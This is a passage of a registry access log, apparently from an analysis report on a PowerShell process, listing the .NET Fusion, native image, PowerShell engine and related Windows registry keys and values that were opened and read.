HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\7f0603e4\73843e06\66

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\a94d4ab\5a294d6

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index127

HKLM\Software\Microsoft\Fusion\PublisherPolicy\Default

HKLM\Software\Microsoft\Fusion\PublisherPolicy\Default\policy.1.0.Microsoft.PowerShell.Commands.Diagnostics__31bf3856ad364e35

HKLM\Software\Microsoft\Fusion\PublisherPolicy\Default\policy.1.0.Microsoft.PowerShell.Commands.Management__31bf3856ad364e35

HKLM\Software\Microsoft\Fusion\PublisherPolicy\Default\policy.1.0.Microsoft.PowerShell.Commands.Utility__31bf3856ad364e35

HKLM\Software\Microsoft\Fusion\PublisherPolicy\Default\policy.1.0.Microsoft.PowerShell.ConsoleHost.resources_en-US_31bf3856ad364e35

HKLM\Software\Microsoft\Fusion\PublisherPolicy\Default\policy.1.0.Microsoft.PowerShell.ConsoleHost__31bf3856ad364e35

HKLM\Software\Microsoft\Fusion\PublisherPolicy\Default\policy.1.0.Microsoft.PowerShell.Security.resources_en-US_31bf3856ad364e35

HKLM\Software\Microsoft\Fusion\PublisherPolicy\Default\policy.1.0.Microsoft.PowerShell.Security__31bf3856ad364e35

HKLM\Software\Microsoft\Fusion\PublisherPolicy\Default\policy.1.0.Microsoft.WSMan.Management.resources_en-US_31bf3856ad364e35

HKLM\Software\Microsoft\Fusion\PublisherPolicy\Default\policy.1.0.Microsoft.WSMan.Management__31bf3856ad364e35

HKLM\Software\Microsoft\Fusion\PublisherPolicy\Default\policy.1.0.Microsoft.WSMan.Runtime__31bf3856ad364e35

HKLM\Software\Microsoft\Fusion\PublisherPolicy\Default\policy.1.0.System.Management.Automation.resources_en-US_31bf3856ad364e35

HKLM\Software\Microsoft\Fusion\PublisherPolicy\Default\policy.1.0.System.Management.Automation__31bf3856ad364e35

HKLM\Software\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.System.Configuration.Install__b03f5f7f11d50a3a

HKLM\Software\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.System.Configuration__b03f5f7f11d50a3a

HKLM\Software\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.System.Data.SqlXml__b77a5c561934e089

HKLM\Software\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.System.Data__b77a5c561934e089

HKLM\Software\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.System.DirectoryServices__b03f5f7f11d50a3a

HKLM\Software\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.System.Drawing__b03f5f7f11d50a3a

HKLM\Software\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.System.EnterpriseServices__b03f5f7f11d50a3a

HKLM\Software\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.System.Management__b03f5f7f11d50a3a

HKLM\Software\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.System.Runtime.Serialization.Formatters.Soap__b03f5f7f11d50a3a

HKLM\Software\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.System.Security__b03f5f7f11d50a3a

HKLM\Software\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.System.ServiceProcess__b03f5f7f11d50a3a

HKLM\Software\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.System.Transactions__b77a5c561934e089

HKLM\Software\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.System.Web.Services__b03f5f7f11d50a3a

HKLM\Software\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.System.Web__b03f5f7f11d50a3a

HKLM\Software\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.System.Windows.Forms__b77a5c561934e089

HKLM\Software\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.System.Xml__b77a5c561934e089

HKLM\Software\Microsoft\Fusion\PublisherPolicy\Default\policy.2.0.System__b77a5c561934e089

HKLM\Software\Microsoft\Fusion\PublisherPolicy\Default\policy.3.5.System.Core__b77a5c561934e089

HKLM\Software\Microsoft\Fusion\PublisherPolicy\Default\policy.8.0.Microsoft.JScript__b03f5f7f11d50a3a

HKLM\Software\Microsoft\Fusion\PublisherPolicy\Default\policy.8.0.Microsoft.VisualC__b03f5f7f11d50a3a

HKLM\Software\Microsoft\PowerShell

HKLM\Software\Microsoft\PowerShell\1

HKLM\Software\Microsoft\PowerShell\1\PowerShellEngine

HKLM\Software\Microsoft\StrongName

HKLM\Software\Microsoft\Windows NT\CurrentVersion

HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options

HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\powershell.exe

HKLM\Software\Microsoft\Windows NT\CurrentVersion\ProfileList\S-1-5-21-2969830022-2362906686-2146684197-500

HKLM\System\CurrentControlSet\Control\Session Manager\Environment

Retrieved a handle to the HKEY_CURRENT_USER key for the user the current thread is impersonating

Registry Read

HKCR\CLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\InprocServer32 Default

HKCR\CLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\Server Default
HKCU\Control Panel\International sYearMonth

HKCU\Environment PSMODULEPATH

HKLM\SOFTWARE\Microsoft\Fusion NoClientChecks

HKLM\SOFTWARE\Microsoft\PowerShell\1

HKLM\SOFTWARE\Microsoft\PowerShell\1\PowerShellEngine ConsoleHostAssemblyName

HKLM\SOFTWARE\Microsoft\PowerShell\1\PowerShellEngine PowerShellVersion

HKLM\SOFTWARE\Microsoft\PowerShell\1\PowerShellEngine RuntimeVersion

HKLM\SOFTWARE\Microsoft\PowerShell\1\ShellIds PipelineMaxStackSizeMB

HKLM\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell path

HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN StackVersion

HKLM\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance First Counter

HKLM\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance IsMultiInstance

HKLM\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance Library

HKLM\SYSTEM\CurrentControlSet\Services\.net clr networking\Performance CategoryOptions

HKLM\SYSTEM\CurrentControlSet\Services\.net clr networking\Performance Counter Names

HKLM\SYSTEM\CurrentControlSet\Services\.net clr networking\Performance FileMappingSize

HKLM\Software\Microsoft\.NETFramework DisableConfigCache

HKLM\Software\Microsoft\.NETFramework InstallRoot

HKLM\Software\Microsoft\.NETFramework OnlyUseLatestCLR

HKLM\Software\Microsoft\.NETFramework UseLegacyV2RuntimeActivationPolicyDefaultValue

HKLM\Software\Microsoft\Fusion CacheLocation

HKLM\Software\Microsoft\Fusion DisableMSIPeek

HKLM\Software\Microsoft\Fusion DownloadCacheQuotaInKB

HKLM\Software\Microsoft\Fusion EnableLog

HKLM\Software\Microsoft\Fusion ForceLog

HKLM\Software\Microsoft\Fusion LogFailures

HKLM\Software\Microsoft\Fusion LogResourceBinds

HKLM\Software\Microsoft\Fusion LoggingLevel

HKLM\Software\Microsoft\Fusion NoClientChecks

HKLM\Software\Microsoft\Fusion UseLegacyIdentityFormat

HKLM\Software\Microsoft\Fusion VersioningLog

HKLM\Software\Microsoft\Fusion\GACChangeNotification\Default Microsoft.JScript,8.0.0.0,,b03f5f7f11d50a3a,MSIL

HKLM\Software\Microsoft\Fusion\GACChangeNotification\Default Microsoft.PowerShell.Commands.Diagnostics,1.0.0.0,,31bf3856ad364e35,MSIL

HKLM\Software\Microsoft\Fusion\GACChangeNotification\Default Microsoft.PowerShell.Commands.Management,1.0.0.0,,31bf3856ad364e35,MSIL

HKLM\Software\Microsoft\Fusion\GACChangeNotification\Default Microsoft.PowerShell.Commands.Utility,1.0.0.0,,31bf3856ad364e35,MSIL

HKLM\Software\Microsoft\Fusion\GACChangeNotification\Default Microsoft.PowerShell.ConsoleHost,1.0.0.0,,31bf3856ad364e35,MSIL

HKLM\Software\Microsoft\Fusion\GACChangeNotification\Default Microsoft.PowerShell.Security,1.0.0.0,,31bf3856ad364e35,MSIL

HKLM\Software\Microsoft\Fusion\GACChangeNotification\Default Microsoft.VisualC,8.0.0.0,,b03f5f7f11d50a3a,MSIL

HKLM\Software\Microsoft\Fusion\GACChangeNotification\Default Microsoft.WSMan.Management,1.0.0.0,,31bf3856ad364e35,MSIL

HKLM\Software\Microsoft\Fusion\GACChangeNotification\Default Microsoft.WSMan.Runtime,1.0.0.0,,31bf3856ad364e35,MSIL

HKLM\Software\Microsoft\Fusion\GACChangeNotification\Default System,2.0.0.0,,b77a5c561934e089,MSIL

HKLM\Software\Microsoft\Fusion\GACChangeNotification\Default System.Configuration,2.0.0.0,,b03f5f7f11d50a3a,MSIL

HKLM\Software\Microsoft\Fusion\GACChangeNotification\Default System.Configuration.Install,2.0.0.0,,b03f5f7f11d50a3a,MSIL

HKLM\Software\Microsoft\Fusion\GACChangeNotification\Default System.Core,3.5.0.0,,b77a5c561934e089,MSIL

HKLM\Software\Microsoft\Fusion\GACChangeNotification\Default System.Data,2.0.0.0,,b77a5c561934e089,x86

HKLM\Software\Microsoft\Fusion\GACChangeNotification\Default System.Data.SqlXml,2.0.0.0,,b77a5c561934e089,MSIL

HKLM\Software\Microsoft\Fusion\GACChangeNotification\Default System.DirectoryServices,2.0.0.0,,b03f5f7f11d50a3a,MSIL

HKLM\Software\Microsoft\Fusion\GACChangeNotification\Default System.Drawing,2.0.0.0,,b03f5f7f11d50a3a,MSIL

HKLM\Software\Microsoft\Fusion\GACChangeNotification\Default System.EnterpriseServices,2.0.0.0,,b03f5f7f11d50a3a,x86
HKLM\Software\Microsoft\Fusion\GACChangeNotification\Default System.Management,2.0.0.0,,b03f5f7f11d50a3a,MSIL

HKLM\Software\Microsoft\Fusion\GACChangeNotification\Default System.Management.Automation,1.0.0.0,,31bf3856ad364e35,MSIL

HKLM\Software\Microsoft\Fusion\GACChangeNotification\Default System.Runtime.Serialization.Formatters.Soap,2.0.0.0,,b03f5f7f11d50a3a,MSIL

HKLM\Software\Microsoft\Fusion\GACChangeNotification\Default System.Security,2.0.0.0,,b03f5f7f11d50a3a,MSIL

HKLM\Software\Microsoft\Fusion\GACChangeNotification\Default System.ServiceProcess,2.0.0.0,,b03f5f7f11d50a3a,MSIL

HKLM\Software\Microsoft\Fusion\GACChangeNotification\Default System.Transactions,2.0.0.0,,b77a5c561934e089,x86

HKLM\Software\Microsoft\Fusion\GACChangeNotification\Default System.Web,2.0.0.0,,b03f5f7f11d50a3a,x86

HKLM\Software\Microsoft\Fusion\GACChangeNotification\Default System.Web.Services,2.0.0.0,,b03f5f7f11d50a3a,MSIL

HKLM\Software\Microsoft\Fusion\GACChangeNotification\Default System.Windows.Forms,2.0.0.0,,b77a5c561934e089,MSIL

HKLM\Software\Microsoft\Fusion\GACChangeNotification\Default System.Xml,2.0.0.0,,b77a5c561934e089,MSIL

HKLM\Software\Microsoft\Fusion\GACChangeNotification\Default mscorlib,2.0.0.0,,b77a5c561934e089,x86

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32 LatestIndex

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\141dfd70\6b79efab\43 DisplayName

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\141dfd70\6b79efab\43 LastModTime

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\141dfd70\6b79efab\43 Modules

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\141dfd70\6b79efab\43 SIG

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\141dfd70\6b79efab\43 Status

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\1bd7b0d8\87 DisplayName

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\1bd7b0d8\87 LastModTime

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\1bd7b0d8\87 Modules

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\1bd7b0d8\87 SIG

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\19ab8d57\1bd7b0d8\87 Status

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\24bf93f6\455bab30\6e DisplayName

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\24bf93f6\455bab30\6e LastModTime

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\24bf93f6\455bab30\6e Modules

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\24bf93f6\455bab30\6e SIG

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\24bf93f6\455bab30\6e Status

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\259d21de\372b3ce5\2f DisplayName

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\259d21de\372b3ce5\2f LastModTime

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\259d21de\372b3ce5\2f Modules

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\259d21de\372b3ce5\2f SIG

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\259d21de\372b3ce5\2f Status

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2b1a4e4\38a3212c\44 DisplayName

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2b1a4e4\38a3212c\44 LastModTime

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2b1a4e4\38a3212c\44 Modules

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2b1a4e4\38a3212c\44 SIG

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2b1a4e4\38a3212c\44 Status

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2b351479\2a0ed676\6a DisplayName

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2b351479\2a0ed676\6a LastModTime

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2b351479\2a0ed676\6a Modules

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2b351479\2a0ed676\6a SIG

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2b351479\2a0ed676\6a Status

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\39f21844\3feac0d8\25 DisplayName

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\39f21844\3feac0d8\25 LastModTime

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\39f21844\3feac0d8\25 Modules

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\39f21844\3feac0d8\25 SIG

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\39f21844\3feac0d8\25 Status

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3a6a696d\52d7076e\72 DisplayName

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3a6a696d\52d7076e\72 LastModTime
HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3a6a696d\52d7076e\72 Modules

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3a6a696d\52d7076e\72 SIG

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3a6a696d\52d7076e\72 Status

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3b249b34\531d6b08\70 DisplayName

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3b249b34\531d6b08\70 LastModTime

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3b249b34\531d6b08\70 Modules

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3b249b34\531d6b08\70 SIG

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3b249b34\531d6b08\70 Status

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3c9c8d7b\46b95040\6c DisplayName

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3c9c8d7b\46b95040\6c LastModTime

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3c9c8d7b\46b95040\6c Modules

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3c9c8d7b\46b95040\6c SIG

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3c9c8d7b\46b95040\6c Status

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3d40437\3f3fc448\34 DisplayName

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3d40437\3f3fc448\34 LastModTime

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3d40437\3f3fc448\34 Modules

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3d40437\3f3fc448\34 SIG

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3d40437\3f3fc448\34 Status

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3d590c3f\59f3b67b\82 DisplayName

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3d590c3f\59f3b67b\82 LastModTime

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3d590c3f\59f3b67b\82 Modules

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3d590c3f\59f3b67b\82 SIG

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3d590c3f\59f3b67b\82 Status

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3f50fe4f\6f1da7aa\88 DisplayName

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3f50fe4f\6f1da7aa\88 LastModTime

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3f50fe4f\6f1da7aa\88 Modules

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3f50fe4f\6f1da7aa\88 SIG

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3f50fe4f\6f1da7aa\88 Status

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\41c04c7e\7f3b6ac4\78 DisplayName

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\41c04c7e\7f3b6ac4\78 LastModTime

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\41c04c7e\7f3b6ac4\78 Modules

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\41c04c7e\7f3b6ac4\78 SIG

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\41c04c7e\7f3b6ac4\78 Status

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\424bd4d8\1c83327b\86 DisplayName

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\424bd4d8\1c83327b\86 LastModTime

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\424bd4d8\1c83327b\86 Modules

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\424bd4d8\1c83327b\86 SIG

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\424bd4d8\1c83327b\86 Status

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\43f5e26f\3b5d08db\26 DisplayName

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\43f5e26f\3b5d08db\26 LastModTime

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\43f5e26f\3b5d08db\26 Modules

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\43f5e26f\3b5d08db\26 SIG

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\43f5e26f\3b5d08db\26 Status

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\475dce40\2d382ce6\85 DisplayName

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\475dce40\2d382ce6\85 LastModTime

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\475dce40\2d382ce6\85 Modules

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\475dce40\2d382ce6\85 SIG

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\475dce40\2d382ce6\85 Status

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\5569937f\21247651\37 DisplayName
HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\5569937f\21247651\37 LastModTime
HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\5569937f\21247651\37 Modules

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\5569937f\21247651\37 SIG

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\5569937f\21247651\37 Status

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\5b43ba09\48ffecdd\76 DisplayName

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\5b43ba09\48ffecdd\76 LastModTime

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\5b43ba09\48ffecdd\76 Modules

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\5b43ba09\48ffecdd\76 SIG

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\5b43ba09\48ffecdd\76 Status

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\6dc7d4c0\a5cd4db\7e DisplayName

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\6dc7d4c0\a5cd4db\7e LastModTime

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\6dc7d4c0\a5cd4db\7e Modules

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\6dc7d4c0\a5cd4db\7e SIG

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\6dc7d4c0\a5cd4db\7e Status

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\73843e06\43a920ef\66 DisplayName

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\73843e06\43a920ef\66 LastModTime

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\73843e06\43a920ef\66 Modules

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\73843e06\43a920ef\66 SIG

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\73843e06\43a920ef\66 Status

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\74219a81\7cb419c4\36 DisplayName

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\74219a81\7cb419c4\36 LastModTime

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\74219a81\7cb419c4\36 Modules

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\74219a81\7cb419c4\36 SIG

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\74219a81\7cb419c4\36 Status

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\75638fee\7566cac\84 DisplayName

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\75638fee\7566cac\84 LastModTime

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\75638fee\7566cac\84 Modules

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\75638fee\7566cac\84 SIG

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\75638fee\7566cac\84 Status

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7950e2c5\183e33de\83 DisplayName

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7950e2c5\183e33de\83 LastModTime

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7950e2c5\183e33de\83 Modules

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7950e2c5\183e33de\83 SIG

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7950e2c5\183e33de\83 Status

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7b5311d7\1b0ed4d\61 DisplayName

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7b5311d7\1b0ed4d\61 LastModTime

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7b5311d7\1b0ed4d\61 Modules

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7b5311d7\1b0ed4d\61 SIG

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7b5311d7\1b0ed4d\61 Status

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7df4ed04\78e5e798\35 DisplayName

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7df4ed04\78e5e798\35 LastModTime

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7df4ed04\78e5e798\35 Modules

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7df4ed04\78e5e798\35 SIG

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7df4ed04\78e5e798\35 Status

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7f5cd084\5675326b\38 DisplayName

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7f5cd084\5675326b\38 LastModTime

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7f5cd084\5675326b\38 Modules

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7f5cd084\5675326b\38 SIG

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7f5cd084\5675326b\38 Status

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\85e83df\4c239d82\71 DisplayName
HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\85e83df\4c239d82\71 LastModTime

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\85e83df\4c239d82\71 Modules

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\85e83df\4c239d82\71 SIG

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\85e83df\4c239d82\71 Status

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\c991064\2bd33e1c\79 DisplayName

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\c991064\2bd33e1c\79 LastModTime

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\c991064\2bd33e1c\79 Modules

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\c991064\2bd33e1c\79 SIG

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\c991064\2bd33e1c\79 Status

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\130e9a23\5569937f\37 ConfigMask

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\130e9a23\5569937f\37 ConfigString

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\130e9a23\5569937f\37 DisplayName

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\130e9a23\5569937f\37 EvalationData

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\130e9a23\5569937f\37 ILDependencies

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\130e9a23\5569937f\37 MVID

HKLM\Software\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\130e9a23\5569937f\37 MissingDependencies

